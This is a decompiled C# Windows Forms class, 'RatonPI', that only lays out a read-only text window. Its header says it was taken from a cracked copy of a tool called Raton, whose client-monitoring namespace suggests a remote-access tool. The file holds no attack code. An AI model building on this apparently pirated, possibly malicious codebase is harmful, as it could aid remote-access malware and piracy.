Files
2026-08-27 11:23:13 -06:00

70 lines
2.3 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Raton.Forms.ClientForms.Monitor.RatonPI
// Assembly: Raton, Version=0.4.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 36C4E416-7F8D-4D23-930F-B5CCB0D810E7
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Raton.exe
using Raton.Classes;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
#nullable disable
namespace Raton.Forms.ClientForms.Monitor;
public class RatonPI : Form
{
private IContainer components;
public TextBox textBox1;
public RatonPI()
{
this.InitializeComponent();
DarkMode.Start((Form) this);
}
private void RatonPI_Load(object sender, EventArgs e)
{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (RatonPI));
this.textBox1 = new TextBox();
this.SuspendLayout();
this.textBox1.BorderStyle = BorderStyle.None;
this.textBox1.Dock = DockStyle.Fill;
this.textBox1.Font = new Font("Microsoft JhengHei", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);
this.textBox1.Location = new Point(0, 0);
this.textBox1.Margin = new Padding(4);
this.textBox1.Multiline = true;
this.textBox1.Name = "textBox1";
this.textBox1.ReadOnly = true;
this.textBox1.Size = new Size(485, 241);
this.textBox1.TabIndex = 0;
this.AutoScaleDimensions = new SizeF(7f, 15f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(485, 241);
this.Controls.Add((Control) this.textBox1);
this.Font = new Font("Microsoft JhengHei", 8.25f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);
this.FormBorderStyle = FormBorderStyle.FixedSingle;
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.Margin = new Padding(4);
this.MaximizeBox = false;
this.Name = nameof (RatonPI);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = nameof (RatonPI);
this.Load += new EventHandler(this.RatonPI_Load);
this.ResumeLayout(false);
this.PerformLayout();
}
}